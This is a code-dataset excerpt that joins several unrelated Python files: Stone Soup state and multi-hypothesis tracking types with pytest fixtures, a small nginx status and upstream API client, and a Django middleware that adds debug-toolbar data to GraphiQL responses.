len(tracker.gaussian_mixture) ``` #### File: stonesoup/types/multihypothesis.py ```python from collections.abc import Sized, Iterable, Container from typing import Sequence from .detection import MissedDetection from .numeric import Probability from ..base import Property from ..types import Type from ..types.detection import Detection from ..types.hypothesis import SingleHypothesis, CompositeHypothesis from ..types.prediction import Prediction class MultipleHypothesis(Type, Sized, Iterable, Container): """Multiple Hypothesis base type A Multiple Hypothesis is a container to store a collection of hypotheses. """ single_hypotheses: Sequence[SingleHypothesis] = Property( default=None, doc="The initial list of :class:`~.SingleHypothesis`. Default `None` " "which initialises with empty list.") normalise: bool = Property( default=False, doc="Normalise probabilities of :class:`~.SingleHypothesis`. Default " "is `False`.") total_weight: float = Property( default=1, doc="When normalising, weights will sum to this. Default is 1.") def __init__(self, single_hypotheses=None, normalise=False, *args, **kwargs): if single_hypotheses is None: single_hypotheses = [] if any(not isinstance(hypothesis, SingleHypothesis) for hypothesis in single_hypotheses): raise ValueError("Cannot form MultipleHypothesis out of " "non-SingleHypothesis inputs!") super().__init__(single_hypotheses, normalise, *args, **kwargs) # normalise the weights of 'single_hypotheses', if indicated if self.normalise: self.normalise_probabilities() def __len__(self): return self.single_hypotheses.__len__() def __contains__(self, index): # check if 'single_hypotheses' contains any SingleHypotheses with # Detection matching 'index' if isinstance(index, Detection): for hypothesis in self.single_hypotheses: if hypothesis.measurement is index: return True return False # check if 'single_hypotheses' contains any SingleHypotheses with # Prediction matching 'index' if isinstance(index, Prediction): for hypothesis in self.single_hypotheses: if hypothesis.prediction is index: return True return False # check if 'single_hypotheses' contains any SingleHypotheses # matching 'index' if isinstance(index, SingleHypothesis): return index in self.single_hypotheses def __iter__(self): for hypothesis in self.single_hypotheses: yield hypothesis def __getitem__(self, index): # retrieve SingleHypothesis by array index if isinstance(index, int): return self.single_hypotheses[index] # retrieve SingleHypothesis by measurement if isinstance(index, Detection): for hypothesis in self.single_hypotheses: if hypothesis.measurement is index: return hypothesis return None # retrieve SingleHypothesis by prediction if isinstance(index, Prediction): for hypothesis in self.single_hypotheses: if hypothesis.prediction is index: return hypothesis return None def normalise_probabilities(self, total_weight=None): if total_weight is None: total_weight = self.total_weight # verify that SingleHypotheses composing this MultipleHypothesis # all have Probabilities if any(not hasattr(hypothesis, 'probability') for hypothesis in self.single_hypotheses): raise ValueError("MultipleHypothesis not composed of Probability" " hypotheses!") sum_weights = Probability.sum( hypothesis.probability for hypothesis in self.single_hypotheses) for hypothesis in self.single_hypotheses: hypothesis.probability =\ (hypothesis.probability * total_weight)/sum_weights def get_missed_detection_probability(self): for hypothesis in self.single_hypotheses: if isinstance(hypothesis.measurement, MissedDetection): if hasattr(hypothesis, 'probability'): return hypothesis.probability return None class MultipleCompositeHypothesis(Type, Sized, Iterable, Container): """Multiple composite hypothesis type A Multiple Composite Hypothesis is a container to store a collection of composite hypotheses. Interfaces the same as MultipleHypothesis, but permits different input, hence methods are redefined. """ single_hypotheses: Sequence[CompositeHypothesis] = Property( default=None, doc="The initial list of :class:`~.CompositeHypothesis`. Default `None` which initialises " "with empty list.") normalise: bool = Property( default=False, doc="Normalise probabilities of :class:`~.CompositeHypothesis`. Default is `False`.") total_weight: float = Property( default=1, doc="When normalising, weights will sum to this. Default is 1.") def __init__(self, single_hypotheses=None, normalise=False, *args, **kwargs): if single_hypotheses is None: single_hypotheses = [] if not all(isinstance(hypothesis, CompositeHypothesis) for hypothesis in single_hypotheses): raise ValueError("Cannot form MultipleHypothesis out of " "non-CompositeHypothesis inputs!") super().__init__(single_hypotheses, normalise, *args, **kwargs) # normalise the weights of 'single_hypotheses', if indicated if self.normalise: self.normalise_probabilities() def __contains__(self, index): # cannot check instance index is detection or prediction as composite hypotheses create # their own composite detections and predictions # check if 'single_hypotheses' contains any CompositeHypotheses matching 'index' # use `is` as standard list __contains__ checks for equality which may not work in cases # where hypotheses do not all share same attributes if isinstance(index, CompositeHypothesis): return any(index is single_hypothesis for single_hypothesis in self.single_hypotheses) def __getitem__(self, index): return self.single_hypotheses.__getitem__(index) def __iter__(self): return self.single_hypotheses.__iter__() def __len__(self): return self.single_hypotheses.__len__() def normalise_probabilities(self, total_weight=None): if total_weight is None: total_weight = self.total_weight # verify that SingleHypotheses composing this MultipleHypothesis # all have Probabilities if any(not hasattr(hypothesis, 'probability') for hypothesis in self.single_hypotheses): raise ValueError( "MultipleHypothesis not composed of composite hypotheses with probabilities") sum_weights = Probability.sum( hypothesis.probability for hypothesis in self.single_hypotheses) # this will NOT affect the probabilities of each composite hypothesis' sub-hypotheses for hypothesis in self.single_hypotheses: hypothesis.probability = \ (hypothesis.probability * total_weight) / sum_weights def get_missed_detection_probability(self): for hypothesis in self.single_hypotheses: if hasattr(hypothesis, 'probability') and not hypothesis: return hypothesis.probability return None ``` #### File: stonesoup/types/state.py ```python import datetime import uuid from collections import abc from typing import MutableSequence, Any, Optional, Sequence import typing import numpy as np from ..base import Property from .array import StateVector, CovarianceMatrix, PrecisionMatrix, StateVectors from .base import Type from .particle import Particle from .numeric import Probability class State(Type): """State type. Most simple state type, which only has time and a state vector.""" timestamp: datetime.datetime = Property( default=None, doc="Timestamp of the state. Default None.") state_vector: StateVector = Property(doc='State vector.') def __init__(self, state_vector, *args, **kwargs): # Don't cast away subtype of state_vector if not necessary if state_vector is not None \ and not isinstance(state_vector, (StateVector, StateVectors)): state_vector = StateVector(state_vector) super().__init__(state_vector, *args, **kwargs) @property def ndim(self): """The number of dimensions represented by the state.""" return self.state_vector.shape[0] @staticmethod def from_state(state: 'State', *args: Any, target_type: Optional[typing.Type] = None, **kwargs: Any) -> 'State': """Class utility function to create a new state (or compatible type) from an existing state. The type and properties of this new state are defined by `state` except for any explicitly overwritten via `args` and `kwargs`. It acts similarly in feel to a copy constructor, with the optional over-writing of properties. Parameters ---------- state: State :class:`~.State` to use existing properties from, and identify new state-type from. \\*args: Sequence Arguments to pass to newly created state, replacing those with same name in `state`. target_type: Type, optional Optional argument specifying the type of of object to be created. This need not necessarily be :class:`~.State` subclass. Any arguments that match between the input `state` and the target type will be copied from the old to the new object (except those explicitly specified in `args` and `kwargs`. \\*\\*kwargs: Mapping New property names and associate value for use in newly created state, replacing those on the `state` parameter. """ # Handle being initialised with state sequence if isinstance(state, StateMutableSequence): state = state.state if target_type is None: target_type = type(state) args_property_names = { name for n, name in enumerate(target_type.properties) if n < len(args)} new_kwargs = { name: getattr(state, name) for name in type(state).properties.keys() & target_type.properties.keys() if name not in args_property_names} new_kwargs.update(kwargs) return target_type(*args, **new_kwargs) class CreatableFromState: class_mapping = {} def __init_subclass__(cls, **kwargs): bases = cls.__bases__ if CreatableFromState in bases: # Direct subclasses should not be added to the class mapping, only subclasses of # subclasses return if len(bases) != 2: raise TypeError('A CreatableFromState subclass must have exactly two superclasses') base_class, state_type = cls.__bases__ if not issubclass(base_class, CreatableFromState): raise TypeError('The first superclass of a CreatableFromState subclass must be a ' 'CreatableFromState (or a subclass)') if not issubclass(state_type, State): # Non-state subclasses do not need adding to the class mapping, as they should not # be created from States return if base_class not in CreatableFromState.class_mapping: CreatableFromState.class_mapping[base_class] = {} CreatableFromState.class_mapping[base_class][state_type] = cls super().__init_subclass__(**kwargs) @classmethod def from_state( cls, state: State, *args: Any, target_type: Optional[type] = None, **kwargs: Any) -> 'State': """ Return new object instance of suitable type from an existing `state`. The type returned can be explicitly specified using the `target_type` argument, otherwise it is chosen by introspection of the created subclasses of this type: see below for an example. Any compatible properties are copied from the input `state` to the returned object, except for those specified by `args` and `kwargs`, which take precedence over those from the input `state`. This method is primarily concerned with type selection, with actual copying performed by the static :meth:`~.State.from_state` method. As an example of the type selection algorithm, consider the case of the class `GaussianStatePrediction(Prediction, GaussianState)`. This is subclass of `Prediction`, and `GaussianState` and so the `class_mapping` property will have an entry added (when `GaussianStatePrediction` is defined) such that `class_mapping[Prediction][GaussianState] = GaussianStatePrediction`. If this method is then called like below >>>> gaussian_state = GaussianState(some_arguments) >>>> new_prediction = Prediction.from_state(gaussian_state, *args, **kwargs) then the `from_state` method will look up the class mapping and see that `Prediction.from_state()` called with a `GaussianState` input should return a `GaussianStatePrediction` object, and therefore the type of `new_prediction` will be `GaussianStatePrediction` The functionality is currently used by :class:`~.Prediction` and :class:`~.Updater` objects. Parameters ---------- state: State :class:`~.State` to use existing properties from, and identify prediction type from \\*args: Sequence Arguments to pass to newly created prediction, replacing those with same name on ``state`` parameter. target_type: Type, optional Type to use for prediction, overriding one from :attr:`class_mapping`. \\*\\*kwargs: Mapping New property names and associate value for use in newly created prediction, replacing those on the ``state`` parameter. """ # Handle being initialised with state sequence if isinstance(state, StateMutableSequence): state = state.state try: state_type = next(type_ for type_ in type(state).mro() if type_ in CreatableFromState.class_mapping[cls]) except StopIteration: raise TypeError(f'{cls.__name__} type not defined for {type(state).__name__}') if target_type is None: target_type = CreatableFromState.class_mapping[cls][state_type] return State.from_state(state, *args, **kwargs, target_type=target_type) class StateMutableSequence(Type, abc.MutableSequence): """A mutable sequence for :class:`~.State` instances This sequence acts like a regular list object for States, as well as proxying state attributes to the last state in the sequence. This sequence can also be indexed/sliced by :class:`datetime.datetime` instances. Example ------- >>> t0 = datetime.datetime(2018, 1, 1, 14, 00) >>> t1 = t0 + datetime.timedelta(minutes=1) >>> state0 = State([[0]], t0) >>> sequence = StateMutableSequence([state0]) >>> print(sequence.state_vector, sequence.timestamp) [[0]] 2018-01-01 14:00:00 >>> sequence.append(State([[1]], t1)) >>> for state in sequence[t1:]: ... print(state.state_vector, state.timestamp) [[1]] 2018-01-01 14:01:00 """ states: MutableSequence[State] = Property( default=None, doc="The initial list of states. Default `None` which initialises with empty list.") def __init__(self, states=None, *args, **kwargs): if states is None: states = [] elif not isinstance(states, abc.Sequence): # Ensure states is a list states = [states] super().__init__(states, *args, **kwargs) def __len__(self): return self.states.__len__() def __setitem__(self, index, value): return self.states.__setitem__(index, value) def __delitem__(self, index): return self.states.__delitem__(index) def __getitem__(self, index): if isinstance(index, slice) and ( isinstance(index.start, datetime.datetime) or isinstance(index.stop, datetime.datetime)): items = [] for state in self.states: try: if index.start and state.timestamp < index.start: continue if index.stop and state.timestamp >= index.stop: continue except TypeError as exc: raise TypeError( 'both indices must be `datetime.datetime` objects for' 'time slice') from exc items.append(state) return StateMutableSequence(items[::index.step]) elif isinstance(index, datetime.datetime): for state in reversed(self.states): if state.timestamp == index: return state else: raise IndexError('timestamp not found in states') elif isinstance(index, slice): return StateMutableSequence(self.states.__getitem__(index)) else: return self.states.__getitem__(index) def __getattribute__(self, name): # This method is called if we try to access an attribute of self. First we try to get the # attribute directly, but if that fails, we want to try getting the same attribute from # self.state instead. If that, in turn, fails we want to return the error message that # would have originally been raised, rather than an error message that the State has no # such attribute. # # An alternative mechanism using __getattr__ seems simpler (as it skips the first few lines # of code, but __getattr__ has no mechanism to capture the originally raised error. try: # This tries first to get the attribute from self. return Type.__getattribute__(self, name) except AttributeError as original_error: if name.startswith("_"): # Don't proxy special/private attributes to `state`, just raise the original error raise original_error else: # For non _ attributes, try to get the attribute from self.state instead of self. try: my_state = Type.__getattribute__(self, 'state') return getattr(my_state, name) except AttributeError: # If we get the error about 'State' not having the attribute, then we want to # raise the original error instead raise original_error def insert(self, index, value): return self.states.insert(index, value) @property def state(self): return self.states[-1] def last_timestamp_generator(self): """Generator yielding the last state for each timestamp This provides a method of iterating over a sequence of states, such that when multiple states for the same timestamp exist, only the last state is yielded. This is particularly useful in cases where you may have multiple :class:`~.Update` states for a single timestamp e.g. multi-sensor tracking example. Yields ------ State A state for each timestamp present in the sequence. """ state_iter = iter(self) current_state = next(state_iter) for next_state in state_iter: if next_state.timestamp > current_state.timestamp: yield current_state current_state = next_state yield current_state class GaussianState(State): """Gaussian State type This is a simple Gaussian state object, which, as the name suggests, is described by a Gaussian state distribution. """ covar: CovarianceMatrix = Property(doc='Covariance matrix of state.') def __init__(self, state_vector, covar, *args, **kwargs): # Don't cast away subtype of covar if not necessary if not isinstance(covar, CovarianceMatrix): covar = CovarianceMatrix(covar) super().__init__(state_vector, covar, *args, **kwargs) if self.state_vector.shape[0] != self.covar.shape[0]: raise ValueError( "state vector and covariance should have same dimensions") @property def mean(self): """The state mean, equivalent to state vector""" return self.state_vector class SqrtGaussianState(State): """A Gaussian State type where the covariance matrix is stored in a form :math:`W` such that :math:`P = WW^T` For :math:`P` in general, :math:`W` is not unique and the user may choose the form to their taste. No checks are undertaken to ensure that a sensible square root form has been chosen. """ sqrt_covar: CovarianceMatrix = Property(doc="A square root form of the Gaussian covariance " "matrix.") def __init__(self, state_vector, sqrt_covar, *args, **kwargs): sqrt_covar = CovarianceMatrix(sqrt_covar) super().__init__(state_vector, sqrt_covar, *args, **kwargs) @property def mean(self): """The state mean, equivalent to state vector""" return self.state_vector @property def covar(self): """The full covariance matrix. Returns ------- : :class:`~.CovarianceMatrix` The covariance matrix calculated via :math:`W W^T`, where :math:`W` is a :class:`~.SqrtCovarianceMatrix` """ return self.sqrt_covar @ self.sqrt_covar.T GaussianState.register(SqrtGaussianState) # noqa: E305 class InformationState(State): r"""Information State Type The information state class carries the :attr:`state_vector`, :math:`\mathbf{y}_k = Y_k \mathbf{x}_k` and the precision or information matrix :math:`Y_k = P_k^{-1}`, where :math:`\mathbf{x}_k` and :math:`P_k` are the mean and covariance, respectively, of a Gaussian state. """ precision: PrecisionMatrix = Property(doc='precision matrix of state.') class WeightedGaussianState(GaussianState): """Weighted Gaussian State Type Gaussian State object with an associated weight. Used as components for a GaussianMixtureState. """ weight: Probability = Property(default=0, doc="Weight of the Gaussian State.") @property def gaussian_state(self): """The Gaussian state.""" return GaussianState(self.state_vector, self.covar, timestamp=self.timestamp) @classmethod def from_gaussian_state(cls, gaussian_state, *args, copy=True, **kwargs): r""" Returns a WeightedGaussianState instance based on the gaussian_state. Parameters ---------- gaussian_state : :class:`~.GaussianState` The guassian_state used to create the new WeightedGaussianState. \*args : See main :class:`~.WeightedGaussianState` args are passed to :class:`~.WeightedGaussianState` __init__() copy : Boolean, optional If True, the WeightedGaussianState is created with copies of the elements of gaussian_state. The default is True. \*\*kwargs : See main :class:`~.WeightedGaussianState` kwargs are passed to :class:`~.WeightedGaussianState` __init__() Returns ------- :class:`~.WeightedGaussianState` Instance of WeightedGaussianState. """ state_vector = gaussian_state.state_vector covar = gaussian_state.covar timestamp = gaussian_state.timestamp if copy: state_vector = state_vector.copy() covar = covar.copy() return cls( state_vector=state_vector, covar=covar, timestamp=timestamp, *args, **kwargs ) class TaggedWeightedGaussianState(WeightedGaussianState): """Tagged Weighted Gaussian State Type Gaussian State object with an associated weight and tag. Used as components for a GaussianMixtureState. """ tag: str = Property(default=None, doc="Unique tag of the Gaussian State.") BIRTH = 'birth' '''Tag value used to signify birth component''' def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) if self.tag is None: self.tag = str(uuid.uuid4()) class ParticleState(State): """Particle State type This is a particle state object which describes the state as a distribution of particles""" state_vector: StateVectors = Property(doc='State vectors.') weight: MutableSequence[Probability] = Property(default=None, doc='Weights of particles') parent: 'ParticleState' = Property(default=None, doc='Parent particles') particle_list: MutableSequence[Particle] = Property(default=None, doc='List of Particle objects') fixed_covar: CovarianceMatrix = Property(default=None, doc='Fixed covariance value. Default `None`, where' 'weighted sample covariance is then used.') def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) if (self.particle_list is not None) and \ (self.state_vector is not None or self.weight is not None): raise ValueError("Use either a list of Particle objects or StateVectors and weights," " but not both.") if self.particle_list and isinstance(self.particle_list, list): self.state_vector = \ StateVectors([particle.state_vector for particle in self.particle_list]) self.weight = \ np.array([Probability(particle.weight) for particle in self.particle_list]) parent_list = [particle.parent for particle in self.particle_list] if parent_list.count(None) == 0: self.parent = ParticleState(None, particle_list=parent_list) elif 0 < parent_list.count(None) < len(parent_list): raise ValueError("Either all particles should have" " parents or none of them should.") if self.parent: self.parent.parent = None # Removed to avoid using significant memory if self.state_vector is not None and not isinstance(self.state_vector, StateVectors): self.state_vector = StateVectors(self.state_vector) if self.weight is not None and not isinstance(self.weight, np.ndarray): self.weight = np.array(self.weight) def __getitem__(self, item): if self.parent: p = self.parent[item] else: p = None particle = Particle(state_vector=self.state_vector[:, item], weight=self.weight[item], parent=p) return particle @property def particles(self): return [particle for particle in self] def __len__(self): return self.state_vector.shape[1] @property def ndim(self): return self.state_vector.shape[0] @property def mean(self): """The state mean, equivalent to state vector""" result = np.average(self.state_vector, axis=1, weights=self.weight) # Convert type as may have type of weights return result @property def covar(self): if self.fixed_covar is not None: return self.fixed_covar cov = np.cov(self.state_vector, ddof=0, aweights=np.array(self.weight)) # Fix one dimensional covariances being returned with zero dimension return cov State.register(ParticleState) # noqa: E305 class EnsembleState(Type): r"""Ensemble State type This is an Ensemble state object which describes the system state as a ensemble of state vectors for use in Ensemble based filters. This approach is functionally identical to the Particle state type except it doesn't use any weighting for any of the "particles" or ensemble members. All "particles" or state vectors in the ensemble are equally weighted. .. math:: \mathbf{X} = [x_1, x_2, ..., x_M] """ state_vector: StateVectors = Property(doc="An ensemble of state vectors which represent the " "state") timestamp: datetime.datetime = Property( default=None, doc="Timestamp of the state. Default None.") @classmethod def from_gaussian_state(self, gaussian_state, num_vectors): """ Returns an EnsembleState instance, from a given GaussianState object. Parameters ---------- gaussian_state : :class:`~.GaussianState` The GaussianState used to create the new EnsembleState. num_vectors : int The number of desired column vectors present in the ensemble. Returns ------- :class:`~.EnsembleState` Instance of EnsembleState. """ mean = gaussian_state.state_vector.reshape((gaussian_state.ndim,)) covar = gaussian_state.covar timestamp = gaussian_state.timestamp return EnsembleState(state_vector=self.generate_ensemble(mean, covar, num_vectors), timestamp=timestamp) @classmethod def generate_ensemble(self, mean, covar, num_vectors): """ Returns a StateVectors wrapped ensemble of state vectors, from a given mean and covariance matrix. Parameters ---------- mean : :class:`~.numpy.ndarray` The mean value of the distribution being sampled to generate ensemble. covar : :class:`~.numpy.ndarray` The covariance matrix of the distribution being sampled to generate ensemble. num_vectors : int The number of desired column vectors present in the ensemble, or the number of "samples". Returns ------- :class:`~.EnsembleState` Instance of EnsembleState. """ # This check is necessary, because the StateVector wrapper does # funny things with dimension. rng = np.random.default_rng() if mean.ndim != 1: mean = mean.reshape(len(mean)) try: ensemble = StateVectors( [StateVector((rng.multivariate_normal(mean, covar))) for n in range(num_vectors)]) # If covar is univariate, then use the univariate noise generation function. except ValueError: ensemble = StateVectors( [StateVector((rng.normal(mean, covar))) for n in range(num_vectors)]) return ensemble @property def ndim(self): """Number of dimensions in state vectors""" return np.shape(self.state_vector)[0] @property def num_vectors(self): """Number of columns in state ensemble""" return np.shape(self.state_vector)[1] @property def mean(self): """The state mean, numerically equivalent to state vector""" return np.average(self.state_vector, axis=1) @property def covar(self): """Sample covariance matrix for ensemble""" return np.cov(self.state_vector) @property def sqrt_covar(self): """sqrt of sample covariance matrix for ensemble, useful for some EnKF algorithms""" return ((self.state_vector-np.tile(self.mean, self.num_vectors)) / np.sqrt(self.num_vectors - 1)) State.register(EnsembleState) # noqa: E305 class CategoricalState(State): r"""CategoricalState type. State object representing an object in a categorical state space. A state vector :math:`\mathbf{\alpha}_t^i = P(\phi_t^i)` defines a categorical distribution over a finite set of discrete categories :math:`\Phi = \{\phi^m|m\in \mathbf{N}, m\le M\}` for some finite :math:`M`.""" categories: Sequence[float] = Property(doc="Category names. Defaults to a list of integers.", default=None) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.state_vector = self.state_vector / np.sum(self.state_vector) # normalise state vector if self.categories is None: self.categories = list(map(str, range(self.ndim))) if len(self.categories) != self.ndim: raise ValueError( f"ndim of {self.ndim} does not match number of categories {len(self.categories)}" ) def __str__(self): strings = [f"P({category}) = {p}" for category, p in zip(self.categories, self.state_vector)] string = ',\n'.join(strings) return string @property def category(self): """Return the name of the most likely category.""" return self.categories[np.argmax(self.state_vector)] class CompositeState(Type): """Composite state type. A composition of ordered sub-states (:class:`State`) existing at the same timestamp, representing an object with a state for (potentially) multiple, distinct state spaces. """ sub_states: Sequence[State] = Property( doc="Sequence of sub-states comprising the composite state. All sub-states must have " "matching timestamp. Must not be empty.") default_timestamp: datetime.datetime = Property( default=None, doc="Default timestamp if no sub-states exist to attain timestamp from. Defaults to " "`None`, whereby sub-states will be required to have timestamps.") def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) if len(self.sub_states) == 0: raise ValueError("Cannot create an empty composite state") self._check_timestamp() # validate timestamps of sub-states @property def timestamp(self): return self.default_timestamp def _check_timestamp(self): """Check all timestamps are equal. Replace empty sub-state timestamps with validated timestamp.""" self._timestamp = None sub_timestamps = {sub_state.timestamp for sub_state in self.sub_states if sub_state.timestamp} if len(sub_timestamps) > 1: raise ValueError("All sub-states must share the same timestamp if defined") if (sub_timestamps and self.default_timestamp and not sub_timestamps == {self.default_timestamp}): raise ValueError("Sub-state timestamps and default timestamp must be the same if " "defined") if sub_timestamps: self.default_timestamp = sub_timestamps.pop() for sub_state in self.sub_states: sub_state.timestamp = self.default_timestamp @property def state_vectors(self): return [state.state_vector for state in self.sub_states] @property def state_vector(self): """A combination of the component states' state vectors.""" return StateVector(np.concatenate(self.state_vectors)) def __contains__(self, item): return self.sub_states.__contains__(item) def __getitem__(self, index): if isinstance(index, slice): return self.__class__(self.sub_states.__getitem__(index)) return self.sub_states.__getitem__(index) def __iter__(self): return self.sub_states.__iter__() def __len__(self): return self.sub_states.__len__() State.register(CompositeState) # noqa: E305 ``` #### File: types/tests/conftest.py ```python import pytest from ..detection import Detection, CompositeDetection from ..hypothesis import SingleHypothesis, CompositeHypothesis, \ CompositeProbabilityHypothesis, SingleProbabilityHypothesis from ..prediction import StatePrediction, CompositePrediction @pytest.fixture() def sub_predictions1(): return [StatePrediction([0]), StatePrediction([1, 2])] @pytest.fixture() def sub_predictions2(): return [StatePrediction([3]), StatePrediction([5, 6])] @pytest.fixture() def composite_prediction1(sub_predictions1): return CompositePrediction(sub_predictions1) @pytest.fixture() def composite_prediction2(sub_predictions2): return CompositePrediction(sub_predictions2) @pytest.fixture() def sub_measurements1(): return [Detection([7]), Detection([3])] @pytest.fixture() def sub_measurements2(): return [Detection([2]), Detection([8])] @pytest.fixture() def composite_measurement1(sub_measurements1): return CompositeDetection(sub_measurements1) @pytest.fixture() def composite_measurement2(sub_measurements2): return CompositeDetection(sub_measurements2) @pytest.fixture() def sub_hypotheses1(sub_predictions1, sub_measurements1): return [ SingleHypothesis(prediction=sub_prediction, measurement=sub_measurement) for sub_prediction, sub_measurement in zip(sub_predictions1, sub_measurements1) ] @pytest.fixture() def sub_hypotheses2(sub_predictions2, sub_measurements2): return [ SingleHypothesis(prediction=sub_prediction, measurement=sub_measurement) for sub_prediction, sub_measurement in zip(sub_predictions2, sub_measurements2) ] @pytest.fixture() def composite_hypothesis1(composite_prediction1, composite_measurement1, sub_hypotheses1): return CompositeHypothesis(sub_hypotheses=sub_hypotheses1, prediction=composite_prediction1, measurement=composite_measurement1) @pytest.fixture() def composite_hypothesis2(composite_prediction2, composite_measurement2, sub_hypotheses2): return CompositeHypothesis(sub_hypotheses=sub_hypotheses2, prediction=composite_prediction2, measurement=composite_measurement2) @pytest.fixture() def sub_probability_hypotheses1(sub_predictions1, sub_measurements1): return [ SingleProbabilityHypothesis(prediction=sub_prediction, measurement=sub_measurement, probability=0.5) for sub_prediction, sub_measurement in zip(sub_predictions1, sub_measurements1) ] @pytest.fixture() def sub_probability_hypotheses2(sub_predictions2, sub_measurements2): return [ SingleProbabilityHypothesis(prediction=sub_prediction, measurement=sub_measurement, probability=0.2) for sub_prediction, sub_measurement in zip(sub_predictions2, sub_measurements2) ] @pytest.fixture() def composite_probability_hypothesis1(composite_prediction1, composite_measurement1, sub_probability_hypotheses1): return CompositeProbabilityHypothesis(sub_hypotheses=sub_probability_hypotheses1, prediction=composite_prediction1, measurement=composite_measurement1) @pytest.fixture() def composite_probability_hypothesis2(composite_prediction2, composite_measurement2, sub_probability_hypotheses2): return CompositeProbabilityHypothesis(sub_hypotheses=sub_probability_hypotheses2, prediction=composite_prediction2, measurement=composite_measurement2) ```
{ "source": "0snug0/ngxpy", "score": 3 }
#### File: ngxpy/ngxpy/ngxpy.py ```python import requests, json, ConfigParser, os ## TODOs ## 1. Add several common ways to add authentication ## * Basic Auth ## * Custom Headers (X-Auth-Key/X-Auth-User) # Defaults for .ngxpy.ini if parameters missing safecfg = { 'schema': 'http', 'host': '127.0.0.1', 'port': '8080', 'status': 'status', 'upstreamConf': 'upstream_conf' } cfg = ConfigParser.SafeConfigParser(safecfg) class ngxpy: def __init__(self, schema='http', host='127.0.0.1', port='8080', status='status', upstreamConf='upstream_conf', cfgSec=None): # If .ngxpy.ini exist, use those values, otherwise use function parameters if cfgSec: home = os.path.expanduser("~") file = '{}/.ngxpy.ini'.format(home) if cfg.read(file): self.host = self.cfgCheck(cfgSec, 'host') self.port = self.cfgCheck(cfgSec, 'port') self.status = self.cfgCheck(cfgSec, 'status') self.upstreamConf = self.cfgCheck(cfgSec, 'upstreamConf') self.schema = self.cfgCheck(cfgSec, 'schema') else: print '{} file is missing'.format(file) exit() else: self.host = host self.port = port self.status = status self.upstreamConf = upstreamConf self.schema = schema self.socket = '{}:{}'.format(self.host, self.port) self.api = '{}://{}/'.format(self.schema, self.socket) def cfgCheck(self, sec, param): try: return cfg.get(sec, param) except: pass class APIError(Exception): def __init__(self, value): self.value = value def __str__(self): return self.value def parse_json(self, request): try: return request.json() except ValueError: return request.text def get(self, url, params=None): r = requests.get(self.api + url, params=params) return self.parse_json(r) def get_status(self): s = self.get(self.status) return s def get_stream_status(self): s = self.get_status()['stream'] return s def get_upstream_conf(self, **kwargs): ''' Available Keys: stream= (Select TCP/UDP server group) upstream=name (Mandatory) id=number remove= (Removes server from group) add= (Adds server to group) backup= (Add server as backup in group) down= (Marks server as down in group) drain= (Drains server from group) up= (Marks server as up in group) server=address service=name weight=number max_conns=number max_fails=number fail_timeout=time slow_start=time route=string (useful for sticky route Loadbalancer) ''' u = self.get(self.upstreamConf, params=kwargs) return u # isHttp=False are tcp/udp zones and upstreams def get_server_zones(self, isHttp=True, zone=None): s = self.get_status()['server_zones'] return s def get_upstreams(self, isHttp=True, upstream=None): s = self.get_status()['upstreams'] return s def get_caches(self): s = self.get_status()['caches'] return s def get_peer_stats(self, upstream, peer_id=None, isHttp=True): peers = [] if isHttp: s = self.get_status()['upstreams'][upstream]['peers'] else: s = self.get_stream_status()['upstreams'][upstream]['peers'] for p in s: if peer_id: if peer_id == p['id']: return p else: peers.append(p) return peers def list_server_zones(self, isHttp=True): server_zones = [] if isHttp: s = self.get_status()['server_zones'] else: s = self.get_stream_status()['server_zones'] for z in s: server_zones.append(z) return server_zones def list_upstreams(self, isHttp=True): upstreams = [] if isHttp: s = self.get_status()['upstreams'] else: s = self.get_stream_status()['upstreams'] for u in s: upstreams.append(u) return upstreams def list_caches(self): caches = [] s = self.get_status()['caches'] for c in s: caches.append(c) return caches def num_of_peers(self, upstream, isHttp=True): if isHttp: s = self.get_status()['upstreams'][upstream]['peers'] else: s = self.get_stream_status()['upstreams'][upstream]['peers'] return len(s) ```
{ "source": "0soft/django-graphiql-debug-toolbar", "score": 2 }
#### File: django-graphiql-debug-toolbar/graphiql_debug_toolbar/middleware.py ```python import functools import json from collections import OrderedDict from django.template.loader import render_to_string from django.utils.encoding import force_text from debug_toolbar import middleware as mmod from debug_toolbar.middleware import _HTML_TYPES from debug_toolbar.middleware import DebugToolbarMiddleware as BaseMiddleware from debug_toolbar.middleware import get_show_toolbar from debug_toolbar.toolbar import DebugToolbar from graphene_django.views import GraphQLView from .serializers import CallableJSONEncoder __all__ = ['DebugToolbarMiddleware'] class _DebugToolbar(DebugToolbar): def __init__(self, middleware, *args, **kwargs): middleware._toolbar = self super().__init__(*args, **kwargs) class MockToolbar(object): def __init__(self, middleware): self._middleware = middleware def __enter__(self): mmod.DebugToolbar = functools.partial(_DebugToolbar, self._middleware) def __exit__(self, exc_type, exc_val, exc_tb): mmod.DebugToolbar = DebugToolbar def set_content_length(response): if response.has_header('Content-Length'): response['Content-Length'] = str(len(response.content)) def get_payload(request, response, toolbar): content = force_text(response.content, encoding=response.charset) payload = json.loads(content, object_pairs_hook=OrderedDict) payload['debugToolbar'] = OrderedDict([('panels', OrderedDict())]) for panel in reversed(toolbar.enabled_panels): if panel.panel_id == 'TemplatesPanel': continue panel.generate_stats(request, response) panel.generate_server_timing(request, response) if panel.has_content: title = panel.title else: title = None payload['debugToolbar']['panels'][panel.panel_id] = { 'title': title, 'subtitle': panel.nav_subtitle, } toolbar.store() payload['debugToolbar']['storeId'] = toolbar.store_id return payload class DebugToolbarMiddleware(BaseMiddleware): def process_view(self, request, view_func, *args): if hasattr(view_func, 'view_class') and\ issubclass(view_func.view_class, GraphQLView): request._graphql_view = True def __call__(self, request): if not get_show_toolbar()(request) or request.is_ajax(): return self.get_response(request) with MockToolbar(self): response = super().__call__(request) content_type = response.get('Content-Type', '').split(';')[0] html_type = content_type in _HTML_TYPES graphql_view = getattr(request, '_graphql_view', False) if response.status_code == 200 and graphql_view and html_type: template = render_to_string('graphiql_debug_toolbar/base.html') response.write(template) set_content_length(response) if html_type or not ( graphql_view and content_type == 'application/json'): return response toolbar = self._toolbar payload = get_payload(request, response, toolbar) response.content = json.dumps(payload, cls=CallableJSONEncoder) set_content_length(response) return response ```
{ "source": "0sparsh2/igel", "score": 2 }
